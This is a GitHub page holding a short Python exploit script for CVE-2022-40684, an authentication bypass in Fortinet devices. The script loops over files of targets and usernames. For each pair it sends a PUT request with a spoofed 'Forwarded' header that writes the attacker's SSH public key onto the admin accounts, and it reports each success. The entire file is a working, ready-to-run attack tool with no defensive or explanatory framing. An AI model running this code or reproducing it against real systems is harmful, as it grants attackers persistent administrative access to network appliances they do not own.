-
Notifications
You must be signed in to change notification settings - Fork 2
/
CVE-2022-40684.py
42 lines (35 loc) · 1.17 KB
/
CVE-2022-40684.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
import requests
import argparse
# Read the input arguments
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--targets", help="Targets file")
parser.add_argument("-u", "--usernames", help="Usernames file")
parser.add_argument("--key", help="id_rsa.pub file")
args = parser.parse_args()
# Read targets
with open(args.targets, "r") as f:
targets = f.read().splitlines()
# Read usernames
with open(args.usernames, "r") as f:
usernames = f.read().splitlines()
# Read id_rsa.pub
with open(args.key, "r") as f:
ssh_public_key = f.read()
# Prepare headers
headers = {
'User-Agent': 'Report Runner',
'Content-Type': 'application/json',
'Forwarded': 'for="[127.0.0.1]:8000";by="[127.0.0.1]:9000";'
}
# Prepare data
data = {
"ssh-public-key1": ssh_public_key
}
for target in targets:
for username in usernames:
url = f"{target}/api/v2/cmdb/system/admin/{username}"
response = requests.put(url, headers=headers, json=data)
if response.status_code == 200 and 'SSH' in response.text:
print(f"[+] Successful exploit for {username} at {url}")
else:
print(f"[-] Failed exploit for {username} at {url}")